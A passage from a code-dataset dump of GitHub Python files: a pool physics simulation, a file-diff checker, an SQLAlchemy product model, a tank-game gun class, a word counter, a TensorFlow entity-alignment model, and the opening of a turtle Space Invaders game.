-cushion_deflection*vels[i][0]\r\n hit_x_cushion[i] = True\r\n else:\r\n hit_x_cushion[i] = False\r\n if y1 <= cushion['top'] or y2 >= cushion['bottom']:\r\n if hit_y_cushion[i] == False:\r\n vels[i][1] = -cushion_deflection*vels[i][1]\r\n hit_y_cushion[i] = True\r\n else:\r\n hit_y_cushion[i] = False\r\n ball_collision(i)\r\n canvas.move(balls[i], vels[i][0]*ft, vels[i][1]*ft)\r\n \r\n for i in range(len(vels)):\r\n vels[i] = 
[rolling_friction*vels[i][0], rolling_friction*vels[i][1]]\r\n if math.hypot(vels[i][0],vels[i][1]) < min_vel:\r\n vels[i] = [0,0]\r\n \r\n canvas.after(1, animate)\r\n\r\nanimate()\r\nroot.mainloop()\r\n\r\n","repo_name":"dmc573/minipool","sub_path":"MiniPool Physics works.py","file_name":"MiniPool Physics works.py","file_ext":"py","file_size_in_byte":5947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"4807288523","text":"fname1 = \"default_results.txt\"\r\nfname2 = \"results.txt\"\r\n\r\nf1 = open(fname1)\r\nf2 = open(fname2)\r\n\r\nprint(\"-----------------------------------\")\r\nprint(\"Comparing files \", \" > \" + fname1, \" < \" +fname2, sep='\\n')\r\nprint(\"-----------------------------------\")\r\nf1_line = f1.readline()\r\nf2_line = f2.readline()\r\n\r\nline_no = 1\r\n\r\nwhile f1_line != '' or f2_line != '':\r\n\r\n f1_line = f1_line.rstrip()\r\n f2_line = f2_line.rstrip()\r\n \r\n if f1_line != f2_line:\r\n \r\n if f2_line == '' and f1_line != '':\r\n print(\">+\", \"Case-%d\" % line_no, f1_line)\r\n elif f1_line != '':\r\n print(\">\", \"Case-%d\" % line_no, f1_line)\r\n \r\n if f1_line == '' and f2_line != '':\r\n print(\"<+\", \"Case-%d\" % line_no, f2_line)\r\n elif f2_line != '':\r\n print(\"<\", \"Case-%d\" % line_no, f2_line, \"\\n\" ,\"Test case %d failed\" % line_no)\r\n else:\r\n print(\"+\",\"Case-%d\" % line_no, \"Passed\")\r\n\t \r\n\r\n f1_line = f1.readline()\r\n f2_line = f2.readline()\r\n\r\n line_no += 1\r\n\r\nf1.close()\r\nf2.close()","repo_name":"sudhamshu091/Automation-of-HDL-Lab-evaluation-using-scripts","sub_path":"test/and_gate/sim/difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"41921869499","text":"#!/usr/bin/python3\n\"\"\" Defining a product class \"\"\"\n\n\nfrom models.base_model import BaseModel, Base\nfrom sqlalchemy import Column, String, Integer, Float, ForeignKey, Enum, event\nfrom sqlalchemy.orm import relationship\n\n\nclass Product(BaseModel, Base):\n \"\"\"Defining a product class\"\"\"\n\n __tablename__ = \"products\"\n\n name = Column(String(128), nullable=False)\n price = Column(Float, nullable=False)\n description = Column(String(1024))\n gender = Column(Enum(\"female\", \"male\", \"kid\"), default=None, nullable=True)\n category_id = Column(\n String(60), ForeignKey(\"categories.id\", ondelete=\"CASCADE\"),\n nullable=False\n )\n reviews = relationship(\n \"Review\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n cart_items = relationship(\n \"CartItem\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n urls = relationship(\n \"Url\", backref=\"product\", cascade=\"all, delete, delete-orphan\"\n )\n","repo_name":"nathan-assefa/Online_store","sub_path":"models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"31529167555","text":"from ball import *\n\n'''\nThis part of the code handles the tank's gun and the launching of projectiles.\n'''\n\n\nclass Gun:\n def __init__(self, screen):\n '''\n Initialize the gun\n screen: the screen the gun lives on\n '''\n self.screen = screen # screen the gun lives on\n self.an = 1 # initial elevation angle of the gun\n self.h = 10 # gun width\n self.l = 60 # gun length\n self.color = GREY # gun color\n\n def fire2_end(self, x, y, speed):\n '''\n Fire the gun.\n x: x-coordinate of the point where the projectile appears\n y: y-coordinate of the point where the projectile appears\n speed: projectile speed\n '''\n if len(balls) < 10: # no more than 10 of one player's projectiles may be on screen\n new_ball = Ball(self.screen, x, y)\n new_ball.vx = speed * math.cos(self.an) # horizontal velocity of the projectile\n new_ball.vy = speed * math.sin(self.an) # vertical velocity of the projectile\n balls.append(new_ball)\n\n def targetting(self, m_x, m_y, x, y):\n '''\n Aim the gun at the cursor. Computes the gun's angle to the horizontal from the input parameters.\n m_x: x-coordinate of the cursor\n m_y: y-coordinate of the cursor\n x: x-coordinate of the gun's base\n y: y-coordinate of the gun's base\n '''\n self.an = math.atan2((m_y - y), (m_x - x))\n\n def draw(self, x, y):\n '''\n Draw the gun\n x: x-coordinate of the gun's base\n y: y-coordinate of the gun's base\n '''\n pygame.draw.polygon(self.screen, self.color,\n [[x - self.h / 2 * np.sin(self.an), y + self.h / 2 * np.cos(self.an)],\n\n [x - self.h / 2 * np.sin(self.an) + self.l * np.cos(self.an),\n y + self.h / 2 * np.cos(self.an) + self.l * np.sin(self.an)],\n\n [x + self.h / 2 * np.sin(self.an) + self.l * np.cos(self.an),\n y - self.h / 2 * np.cos(self.an) + self.l * np.sin(self.an)],\n\n [x + self.h / 2 * np.sin(self.an), y - self.h / 2 * np.cos(self.an)]])\n","repo_name":"Sparinout/tanchiki_with_love","sub_path":"game/gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"28713361640","text":"# Third question\n\nimport collections\nfrom one import words\n\ncn = collections.Counter(words)\nmost_common_list = cn.most_common(10)\n\nwith open(\"out_most_frequent.txt\", \"w\") as new_file_2:\n for i, j in enumerate(most_common_list):\n new_file_2.write(f\"{i+1}. 
{j[0]} {j[1]}\\n\")\n","repo_name":"snowball-grinch/hwpy","sub_path":"solutions/06.wasteland/three.py","file_name":"three.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"29417668291","text":"import math\nfrom .Init import *\nimport scipy.spatial\nimport json\nimport pickle as pkl\nimport os\n\ndef get_vmat(e, KG):\n du = [1] * e\n for tri in KG:\n if tri[0] != tri[2]:\n du[tri[0]] += 1\n du[tri[2]] += 1\n M = {}\n for tri in KG:\n if tri[0] == tri[2]:\n continue\n if (tri[0], tri[2]) not in M:\n M[(tri[0], tri[2])] = 1\n else:\n pass\n if (tri[2], tri[0]) not in M:\n M[(tri[2], tri[0])] = 1\n else:\n pass\n\n return M, du\n\n\ndef get_nbr(M, e, max_nbr):\n nbr = []\n for i in range(e):\n nbr.append([])\n for (i, j) in M:\n if i != j and (max_nbr == -1 or len(nbr[i]) < max_nbr):\n nbr[i].append(j)\n if max_nbr == -1:\n for i in range(e):\n if (len(nbr[i]) > max_nbr):\n max_nbr = len(nbr[i])\n\n mask = []\n for i in range(e):\n mask.append([1] * len(nbr[i]) + [0] * (max_nbr - len(nbr[i])))\n nbr[i] += [0] * (max_nbr - len(nbr[i]))\n\n return np.asarray(nbr, dtype=np.int32), np.asarray(mask)\n\n\ndef get_sparse_tensor(e, KG):\n print('getting a sparse tensor...')\n M0, du = get_vmat(e, KG)\n ind = []\n val = []\n for fir, sec in M0:\n ind.append((sec, fir))\n val.append(M0[(fir, sec)] / math.sqrt(du[fir]) / math.sqrt(du[sec]))\n\n M = tf.SparseTensor(indices=ind, values=val, dense_shape=[e, e])\n\n return M0, M\n\n\ndef get_se_input_layer(e, dimension, file_path):\n print('adding the primal input layer...')\n with open(file=file_path, mode='r', encoding='utf-8') as f:\n embedding_list = json.load(f)\n print(len(embedding_list), 'rows,', len(embedding_list[0]), 'columns.')\n input_embeddings = tf.convert_to_tensor(embedding_list)\n ent_embeddings = tf.Variable(input_embeddings)\n return tf.nn.l2_normalize(ent_embeddings, 1)\n\n\ndef add_diag_layer(inlayer, dimension, M, act_func, dropout=0.0, init=ones):\n inlayer = tf.nn.dropout(inlayer, 1 - dropout)\n print('adding a layer...')\n w0 = init([1, dimension])\n tosum = tf.sparse_tensor_dense_matmul(M, tf.multiply(inlayer, w0))\n if act_func is None:\n return tosum\n else:\n return act_func(tosum)\n\n\ndef highway(layer1, layer2, dimension):\n kernel_gate = glorot([dimension, dimension])\n bias_gate = zeros([dimension])\n transform_gate = tf.matmul(layer1, kernel_gate) + bias_gate\n transform_gate = tf.nn.sigmoid(transform_gate)\n carry_gate = 1.0 - transform_gate\n return transform_gate * layer2 + carry_gate * layer1\n\n\ndef softmax_positiv(T):\n Tsign = tf.greater(T, 0)\n _reduce_sum = tf.reduce_sum(\n tf.exp(tf.where(Tsign, T, tf.zeros_like(T))), -1, keepdims=True) + math.e\n return tf.where(Tsign, tf.exp(T) / _reduce_sum, T)\n\n\ndef neighborhood_matching(inlayer, mask, max_nbr, beta):\n inlayer_ILL = tf.tile(tf.expand_dims(inlayer[0], 2), [1, 1, max_nbr, 1])\n inlayer_can = tf.tile(tf.expand_dims(inlayer[1], 2), [1, 1, max_nbr, 1])\n inlayer_ILL_trans = tf.transpose(inlayer_ILL, [0, 2, 1, 3])\n inlayer_can_trans = tf.transpose(inlayer_can, [0, 2, 1, 3])\n sim_ILL = tf.reduce_sum(tf.multiply(inlayer_ILL, inlayer_can_trans), -1)\n sim_can = tf.reduce_sum(tf.multiply(inlayer_can, inlayer_ILL_trans), -1)\n mask_ILL = tf.expand_dims(mask[0], -1)\n mask_can = tf.expand_dims(mask[1], 1)\n mask_all = tf.einsum('ijk,ikl->ijl', mask_ILL, mask_can)\n\n a_ILL = softmax_positiv(tf.multiply(sim_ILL, mask_all))\n a_can = softmax_positiv(tf.multiply(\n sim_can, 
tf.transpose(mask_all, [0, 2, 1])))\n\n m_ILL = inlayer[0] - \\\n tf.reduce_sum(tf.multiply(inlayer_can_trans,\n tf.expand_dims(a_ILL, -1)), 2)\n m_can = inlayer[1] - \\\n tf.reduce_sum(tf.multiply(inlayer_ILL_trans,\n tf.expand_dims(a_can, -1)), 2)\n m = tf.stack([m_ILL, m_can], 0) * beta\n output_layer = tf.concat([inlayer, m], -1)\n return output_layer\n\n\ndef mock_neighborhood_matching(inlayer, nbr_weight, max_nbr, beta):\n inlayer_ILL = tf.tile(tf.expand_dims(inlayer[0], 2), [1, 1, max_nbr, 1])\n inlayer_can = tf.tile(tf.expand_dims(inlayer[1], 2), [1, 1, max_nbr, 1])\n inlayer_ILL_trans = tf.transpose(inlayer_ILL, [0, 2, 1, 3])\n inlayer_can_trans = tf.transpose(inlayer_can, [0, 2, 1, 3])\n sim_ILL = tf.reduce_sum(tf.multiply(inlayer_ILL, inlayer_can_trans), -1)\n sim_can = tf.reduce_sum(tf.multiply(inlayer_can, inlayer_ILL_trans), -1)\n weight_ILL = tf.expand_dims(nbr_weight[0], -1)\n weight_can = tf.expand_dims(nbr_weight[1], 1)\n weight_all = tf.einsum('ijk,ikl->ijl', weight_ILL, weight_can)\n\n a_ILL = softmax_positiv(tf.multiply(sim_ILL, weight_all))\n a_can = softmax_positiv(tf.multiply(\n sim_can, tf.transpose(weight_all, [0, 2, 1])))\n\n m_ILL = inlayer[0] - \\\n tf.reduce_sum(tf.multiply(inlayer_can_trans,\n tf.expand_dims(a_ILL, -1)), 2)\n m_can = inlayer[1] - \\\n tf.reduce_sum(tf.multiply(inlayer_ILL_trans,\n tf.expand_dims(a_can, -1)), 2)\n m = tf.stack([m_ILL, m_can], 0) * beta\n output_layer = tf.concat([inlayer, m], -1)\n return output_layer\n\n\ndef neighborhood_aggregation(outlayer, mask, w_gate, w_N, act_func):\n weight_ij = tf.einsum('ijkl,lp->ijkp', outlayer, w_gate)\n if act_func is not None:\n weight_ij = act_func(weight_ij) \n h_sum = tf.einsum('ijkl,ijkl->ijkl', outlayer, weight_ij)\n h_sum = tf.reduce_sum(tf.multiply(h_sum, tf.expand_dims(mask, -1)), 2)\n h_j = tf.einsum('ijk,kl->ijl', h_sum, w_N) \n return h_j\n\n\ndef mock_neighborhood_aggregation(outlayer, nbr_weight, w_gate, w_N, act_func):\n weight_ij = tf.einsum('ijkl,lp->ijkp', outlayer, w_gate)\n if act_func is not None:\n weight_ij = act_func(weight_ij)\n h_sum = tf.einsum('ijkl,ijkl->ijkl', outlayer, weight_ij)\n h_sum = tf.reduce_sum(tf.multiply(\n h_sum, tf.expand_dims(nbr_weight, -1)), 2)\n h_j = tf.einsum('ijk,kl->ijl', h_sum, w_N)\n return h_j\n\n\ndef get_loss_pre(outlayer, ILL, gamma, k, neg_left, neg_right, neg2_left, neg2_right):\n left = ILL[:, 0]\n right = ILL[:, 1]\n left_x = tf.nn.embedding_lookup(outlayer, left)\n right_x = tf.nn.embedding_lookup(outlayer, right)\n\n A = tf.reduce_sum(tf.abs(left_x - right_x), 1)\n neg_l_x = tf.nn.embedding_lookup(outlayer, neg_left)\n neg_r_x = tf.nn.embedding_lookup(outlayer, neg_right)\n B = tf.reduce_sum(tf.abs(neg_l_x - neg_r_x), 1)\n C = - tf.reshape(B, [-1, k])\n D = A + gamma\n L1 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n neg_l_x = tf.nn.embedding_lookup(outlayer, neg2_left)\n neg_r_x = tf.nn.embedding_lookup(outlayer, neg2_right)\n B = tf.reduce_sum(tf.abs(neg_l_x - neg_r_x), 1)\n C = - tf.reshape(B, [-1, k])\n L2 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n return (tf.reduce_mean(L1) + tf.reduce_mean(L2)) / 2.0\n\n\ndef get_loss_match(outlayer, ILL, gamma, c, dimension):\n out = tf.reshape(outlayer, [2, -1, 2, c, dimension])\n A = tf.reduce_sum(tf.abs(out[0, :, 0, 0] - out[1, :, 0, 0]), -1)\n B = tf.reduce_sum(tf.abs(out[0, :, 0, 1:c] - out[1, :, 0, 1:c]), -1)\n C = - tf.reshape(B, [-1, c - 1])\n D = A + gamma\n L1 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n B = tf.reduce_sum(tf.abs(out[0, :, 1, 1:c] - out[1, :, 1, 1:c]), 
-1)\n C = - tf.reshape(B, [-1, c - 1])\n L2 = tf.nn.relu(tf.add(C, tf.reshape(D, [-1, 1])))\n return (tf.reduce_mean(L1) + tf.reduce_mean(L2)) / 2.0\n\n\ndef get_loss_w(select_train, outlayer, nbr_all,\n mask_all, sample_w, w_gate, w_N,\n ILL, max_nbr_all, beta):\n left = tf.gather(ILL[:, 0], select_train)\n right = tf.gather(ILL[:, 1], select_train)\n t = 10\n idx = tf.concat([left, right], axis=0) \n\n outlayer_idx = tf.gather(outlayer, idx)\n nbr_idx = tf.gather(nbr_all, idx)\n mask_idx = tf.to_float(tf.gather(mask_all, idx))\n outlayer_nbr_idx = tf.gather(outlayer, nbr_idx)\n out_sim = tf.einsum('ij,ijk->ik', tf.matmul(outlayer_idx, sample_w),\n tf.transpose(outlayer_nbr_idx, [0, 2, 1]))\n nbr_weight = tf.reshape(softmax_positiv(tf.multiply(\n out_sim, mask_idx)), (2, t, -1)) \n\n outlayer_idx = tf.reshape(outlayer_idx, (2, t, -1))\n nbr_idx = tf.reshape(nbr_idx, (2, t, -1))\n outlayer_nbr_idx = tf.gather(outlayer, nbr_idx)\n mock_hat_h = mock_neighborhood_matching(\n outlayer_nbr_idx, nbr_weight, max_nbr_all, beta) \n mock_g = mock_neighborhood_aggregation(\n mock_hat_h, nbr_weight, w_gate, w_N, tf.sigmoid)\n left_x = tf.concat([outlayer_idx[0], mock_g[0]], axis=-1)\n right_x = tf.concat([outlayer_idx[1], mock_g[1]], axis=-1)\n\n A = tf.reduce_sum(tf.abs(left_x - right_x), 1)\n return tf.reduce_mean(A)\n\n\ndef build(dimension, dimension_g, act_func, gamma, k, vec_path, e, all_nbr_num, sampled_nbr_num, beta, KG):\n tf.reset_default_graph()\n input_layer = get_se_input_layer(e, dimension, vec_path)\n M0, M = get_sparse_tensor(e, KG)\n nbr_all, mask_all = get_nbr(M0, e, all_nbr_num)\n\n print('KG structure embedding')\n hidden_layer_1 = add_diag_layer(\n input_layer, dimension, M, act_func, dropout=0.0)\n hidden_layer = highway(input_layer, hidden_layer_1, dimension)\n hidden_layer_2 = add_diag_layer(\n hidden_layer, dimension, M, act_func, dropout=0.0)\n output_h = highway(hidden_layer, hidden_layer_2, dimension)\n print('shape of output_h: ', output_h.get_shape())\n\n c = tf.placeholder(tf.int32, None, \"c\")\n nbr_sampled = tf.placeholder(tf.int32, [e, sampled_nbr_num], \"nbr_sampled\")\n mask_sampled = tf.placeholder(tf.float32, [e, sampled_nbr_num], \"mask_sampled\")\n ILL = tf.placeholder(tf.int32, [None, 2], \"ILL\")\n candidate = tf.placeholder(tf.int32, [None], \"candidate\") \n candidate = tf.reshape(tf.transpose(\n tf.reshape(candidate, (2, -1, c)), (1, 0, 2)), [-1]) \n idx_pair = tf.stack(\n [tf.reshape(tf.tile(tf.expand_dims(ILL, -1), (1, 1, c)), [-1]), candidate])\n nbr_pair = tf.gather(nbr_sampled, idx_pair)\n mask_pair = tf.gather(mask_sampled, idx_pair)\n h_ctr = tf.nn.embedding_lookup(output_h, idx_pair)\n h_nbr = tf.nn.embedding_lookup(\n output_h, nbr_pair)\n\n w_gate = glorot([dimension * 2, dimension * 2])\n w_N = glorot([dimension * 2, dimension_g])\n\n print('neighborhood matching')\n output_hat_h = neighborhood_matching(h_nbr, mask_pair, sampled_nbr_num, beta)\n print('shape of output_hat_h: ', output_hat_h.get_shape())\n\n print('neighborhood aggregation')\n output_g = neighborhood_aggregation(\n output_hat_h, mask_pair, w_gate, w_N, tf.sigmoid)\n output_h_match = tf.concat([tf.reshape(\n h_ctr, [-1, dimension]), tf.reshape(output_g, [-1, dimension_g])], -1)\n dimension3 = dimension + dimension_g\n print('shape of output_h_match: ', output_h_match.get_shape())\n\n print(\"compute pre-training loss\")\n neg_left = tf.placeholder(tf.int32, [None], \"neg_left\") \n neg_right = tf.placeholder(tf.int32, [None], \"neg_right\")\n neg2_left = tf.placeholder(tf.int32, 
[None], \"neg2_left\")\n neg2_right = tf.placeholder(tf.int32, [None], \"neg2_right\")\n loss_pre = get_loss_pre(output_h, ILL, gamma, k, neg_left,\n neg_right, neg2_left, neg2_right)\n\n print(\"compute overall loss\")\n loss_match = get_loss_match(output_h_match, ILL, gamma, c, dimension3)\n alpha = tf.placeholder(tf.float32, None, \"alpha\")\n loss_all = (1 - alpha) * loss_pre + alpha * loss_match\n\n print(\"compute sampling process loss\")\n select_train = tf.placeholder(tf.int32, [10], \"select_train\")\n sample_w = tf.Variable(tf.eye(dimension, name=\"sample_w\"))\n loss_w = get_loss_w(select_train, output_h, nbr_all,\n mask_all, sample_w, w_gate, w_N,\n ILL, all_nbr_num, beta)\n\n return output_h, output_h_match, loss_all, sample_w, loss_w, M0, nbr_all, mask_all\n\n\ndef get_neg(ILL, output_layer, k, batchnum):\n neg = []\n t = len(ILL)\n ILL_vec = np.array([output_layer[e1] for e1 in ILL])\n KG_vec = np.array(output_layer)\n for p in range(batchnum):\n head = int(t / batchnum * p)\n if p==batchnum-1:\n tail=t\n else:\n tail = int(t / batchnum * (p + 1))\n sim = scipy.spatial.distance.cdist(\n ILL_vec[head:tail], KG_vec, metric='cityblock')\n for i in range(tail - head):\n rank = sim[i, :].argsort()\n neg.append(rank[0: k])\n\n neg = np.array(neg)\n neg = neg.reshape((t * k,))\n\n return neg\n\n\ndef np_softmax(x, T=0.1):\n x = x - np.max(x, axis=-1, keepdims=True)\n return np.exp(x / T) / np.sum(np.exp(x / T), axis=-1, keepdims=True)\n\n\ndef sample_nbr(out, nbr_all, mask_all, e, max_nbr, w, batchnum):\n nbr = []\n for p in range(batchnum):\n head = int(e / batchnum * p)\n if p==batchnum-1:\n tail=e\n else:\n tail = int(e / batchnum * (p + 1))\n mask_p = mask_all[head:tail]\n nbr_p = nbr_all[head:tail]\n sim = np.dot(np.dot(out[head:tail], w), out.transpose())\n x_axis_index = np.tile(np.arange(tail - head),\n (nbr_all.shape[1], 1)).transpose()\n\n eps = 1e-8\n prob = sim[x_axis_index, nbr_p] - 1e8 * (1 - mask_p)\n prob = np_softmax(prob) + eps * mask_p\n prob = prob / np.sum(prob, axis=1, keepdims=True)\n\n for i in range(tail - head):\n if np.sum(mask_p[i]) > max_nbr:\n nbr.append(nbr_p[i, np.random.choice(\n nbr_all.shape[1], max_nbr, replace=False, p=prob[i])])\n else:\n nbr.append(nbr_p[i, 0:max_nbr])\n mask = mask_all[:, 0:max_nbr]\n\n return nbr, mask\n\n\ndef mask_candidate(e, e1, e2):\n mask_e1 = np.zeros(e)\n mask_e2 = np.zeros(e)\n for x in e1:\n mask_e1[x] = 1\n for x in e2:\n mask_e2[x] = 1\n return mask_e1, mask_e2\n\n\ndef sample_candidate(ILL, ILL_true, out, k, mask_e, batchnum):\n t = len(ILL)\n e = len(out)\n ILL_vec = np.array([out[x] for x in ILL])\n KG_vec = np.array(out)\n neg = []\n for p in range(batchnum):\n head = int(t / batchnum * p)\n if p==batchnum-1:\n tail=t\n else:\n tail = int(t / batchnum * (p + 1))\n sim = scipy.spatial.distance.cdist(\n ILL_vec[head:tail], KG_vec, metric='cityblock')\n mask_gold = np.zeros((tail - head, e))\n for i in range(tail - head):\n mask_gold[i][ILL_true[i + head]] = 1\n mask = np.tile(mask_e, (tail - head, 1)) + mask_gold\n prob = np_softmax(- sim - 1e8 * mask_gold)\n for i in range(tail - head):\n neg.append(np.random.choice(e, k - 1, replace=False, p=prob[i]))\n\n candidate = np.concatenate(\n (np.expand_dims(ILL_true, -1), np.asarray(neg)), axis=1)\n candidate = candidate.reshape((t * k,))\n return candidate\n\n\ndef training(output_h, output_h_match, loss_all, sample_w, loss_w, learning_rate, \n epochs, pre_epochs, ILL, e, k, sampled_nbr_num, save_suffix, dimension, dimension_g, c, \n train_batchnum, 
test_batchnum,\n test, M0, e1, e2, nbr_all, mask_all):\n from include.Test import get_hits, get_hits_new\n train_step = tf.train.AdamOptimizer(learning_rate).minimize(loss_all)\n train_step_w = tf.train.AdamOptimizer(\n learning_rate).minimize(loss_w, var_list=[sample_w])\n print('initializing...')\n saver = tf.train.Saver()\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n print('running...')\n J = []\n ILL = np.array(ILL)\n t = len(ILL)\n ILL_reshape = np.reshape(ILL, 2 * t, order='F')\n L = np.ones((t, k)) * (ILL[:, 0].reshape((t, 1)))\n neg_left = L.reshape((t * k,))\n L = np.ones((t, k)) * (ILL[:, 1].reshape((t, 1)))\n neg2_right = L.reshape((t * k,))\n\n nbr_sampled, mask_sampled = get_nbr(M0, e, sampled_nbr_num)\n mask_e1, mask_e2 = mask_candidate(e, e1, e2)\n test_reshape = np.reshape(np.array(test), -1, order='F')\n sample_w_vec = np.identity(dimension)\n test_can_num=50\n\n if not os.path.exists(\"model/\"):\n os.makedirs(\"model/\")\n\n if os.path.exists(\"model/save_\"+save_suffix+\".ckpt.meta\"):\n saver.restore(sess, \"model/save_\"+save_suffix+\".ckpt\")\n start_epoch=pre_epochs\n else:\n start_epoch=0\n\n for i in range(start_epoch, epochs):\n if i % 50 == 0:\n out = sess.run(output_h)\n print('get negative pairs')\n neg2_left = get_neg(ILL[:, 1], out, k, train_batchnum)\n neg_right = get_neg(ILL[:, 0], out, k, train_batchnum)\n print('sample candidates')\n c_left = sample_candidate(ILL[:, 1], ILL[:, 0], out, c, mask_e2, train_batchnum)\n c_right = sample_candidate(ILL[:, 0], ILL[:, 1], out, c, mask_e1, train_batchnum)\n candidate = np.reshape(np.concatenate(\n (c_right, c_left), axis=0), (2, len(ILL), c)) \n print('sample neighborhood')\n nbr_sampled, mask_sampled = sample_nbr(\n out, nbr_all, mask_all, e, sampled_nbr_num, sample_w_vec, test_batchnum)\n feeddict = {\"ILL:0\": ILL,\n \"candidate:0\": candidate.reshape((-1,)),\n \"neg_left:0\": neg_left,\n \"neg_right:0\": neg_right,\n \"neg2_left:0\": neg2_left,\n \"neg2_right:0\": neg2_right,\n \"nbr_sampled:0\": nbr_sampled,\n \"mask_sampled:0\": mask_sampled,\n \"c:0\": c}\n\n if i < pre_epochs:\n feeddict[\"alpha:0\"] = 0\n else:\n feeddict[\"alpha:0\"] = 1\n\n for j in range(train_batchnum):\n beg = int(t / train_batchnum * j)\n if j==train_batchnum-1:\n end=t\n else:\n end = int(t / train_batchnum * (j + 1))\n feeddict[\"ILL:0\"] = ILL[beg:end]\n feeddict[\"candidate:0\"] = candidate[:, beg:end].reshape((-1,))\n feeddict[\"neg_left:0\"] = neg_left.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg_right:0\"] = neg_right.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg2_left:0\"] = neg2_left.reshape(\n (t, k))[beg:end].reshape((-1,))\n feeddict[\"neg2_right:0\"] = neg2_right.reshape(\n (t, k))[beg:end].reshape((-1,))\n _ = sess.run([train_step], feed_dict=feeddict)\n\n if i == pre_epochs - 1:\n save_path = saver.save(sess, \"model/save_\"+save_suffix+\".ckpt\")\n print(\"Save to path: \", save_path)\n\n if i % 10 == 0:\n print('%d/%d' % (i + 1, epochs), 'epochs...')\n outvec = sess.run(output_h, feed_dict=feeddict)\n test_can = get_hits(outvec, test, test_can_num)\n if i >= pre_epochs:\n for j in range(test_batchnum):\n beg = int(len(test) / test_batchnum * j)\n if j==test_batchnum-1:\n end=len(test)\n else:\n end = int(len(test) / test_batchnum * (j + 1))\n feeddict_test = {\"ILL:0\": test[beg:end],\n \"candidate:0\": test_can[:, beg:end].reshape((-1,)),\n \"nbr_sampled:0\": nbr_sampled,\n \"mask_sampled:0\": mask_sampled,\n \"c:0\": test_can_num}\n outvec_h_match 
= sess.run(\n output_h_match, feed_dict=feeddict_test)\n if j == 0:\n outvec_h_match_all = outvec_h_match.reshape((2, -1, dimension+dimension_g))\n else:\n outvec_h_match_all = np.concatenate(\n [outvec_h_match_all, outvec_h_match.reshape((2, -1, dimension+dimension_g))], axis=1)\n get_hits_new(outvec_h_match_all, test_can, test, test_can_num)\n\n if i >= pre_epochs and i % 50 == 49:\n print('train sample w')\n for _ in range(10):\n select_train = np.random.choice(len(ILL), 10)\n feeddict[\"select_train:0\"] = select_train\n for j in range(5):\n _, thw = sess.run([train_step_w, loss_w],\n feed_dict=feeddict)\n print(thw)\n sample_w_vec = sess.run(sample_w, feed_dict=feeddict)\n\n sess.close()\n return outvec, J\n","repo_name":"StephanieWyt/NMN","sub_path":"include/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":20692,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"19"}
{"seq_id":"4039000477","text":"# space invaders\nimport turtle\nimport os\nimport math\nimport random\nimport winsound\n# set up screen and graphics\nwn = turtle.Screen()\nwn.bgcolor(\"black\")\nwn.title(\"Space Invaders\")\nwn.bgpic(\"space_invaders_background.gif\")\n\nturtle.register_shape(\"invader.gif\")\nturtle.register_shape(\"player.gif\")\n# draw border\nborder_pen=turtle.Turtle()\nborder_pen.speed(0)\nborder_pen.color(\"white\")\nborder_pen.penup()\nborder_pen.setposition(-300,-300)\nborder_pen.pendown()\nborder_pen.pensize(3)\nfor side in range(4):\n\tborder_pen.fd(600)\n\tborder_pen.lt(90)\nborder_pen.hideturtle()\n\n# Set the score to 0\nscore = 0\n\n# Draw the score\nscore_pen = turtle.Turtle()\nscore_pen.speed(0)\nscore_pen.color(\"white\")\nscore_pen.penup()\nscore_pen.setposition(-290, 280)\nscorestring = \"Score: %s\" %score\nscore_pen.write(scorestring, False, align=\"left\", font=(\"Arial\", 14, \"normal\"))\nscore_pen.hideturtle()\n\n# create the player turtle\nplayer = turtle.Turtle()\nplayer.color(\"blue\")\nplayer.shape(\"player.gif\")\nplayer.penup()\nplayer.speed(0)\nplayer.setposition(0, -250)\nplayer.setheading(90)\n\n# move player left and right\nPlayerspeed = 15 \ndef move_left():\n x = player.xcor()\n x -= Playerspeed\n if x < -280 :\n \tx = -280\n player.setx(x)\n\ndef move_right():\n x = player.xcor()\n x += Playerspeed\n if x > 280 :\n \tx = 280\n player.setx(x)\n# sound effects\ndef laser():\n winsound.PlaySound(\"laser.wav\", winsound.SND_ASYNC)\ndef explosion():\n winsound.PlaySound(\"explosion.wav\", winsound.SND_ASYNC)\n\n# fire function\ndef fire():\n\tglobal bulletstate\n\tif bulletstate==\"ready\":\n\t\tlaser()\n\t\tbulletstate=\"fire\"\n\t\tx=player.xcor()\n\t\ty=player.ycor() + 10\n\t\tbullet.setposition(x,y)\n\t\tbullet.showturtle()\n\n\n\n\n\n# create keyboard bindings\nturtle.listen()\nturtle.onkey(move_left,\"Left\")\nturtle.onkey(move_right,\"Right\")\nturtle.onkey(fire,\"space\")\n\nnumber_of_enemies=5\nenemies=[]\nfor i in range(number_of_enemies):\n\tenemies.append(turtle.Turtle())\n# create the enemies\nfor enemy in enemies:\n\tenemy.color(\"red\")\n\tenemy.shape(\"invader.gif\")\n\tenemy.penup()\n\tenemy.speed(0)\n\tx = random.randint(-200, 200)\n\ty = random.randint(100, 250)\n\tenemy.setposition(x,y)\nenemyspeed = 4\n\n# define bullet state\n# bullet ready to fire \n# bullet is firing\n# create the weapon (bullet)\nbullet=turtle.Turtle()\nbullet.shape(\"triangle\")\nbullet.color(\"yellow\")\nbullet.speed(0)\nbullet.penup()\nbullet.setheading(90)\nbullet.shapesize(0.5,0.5)\nbullet.hideturtle()\nbulletspeed=20\nbulletstate=\"ready\"\n\n# if 
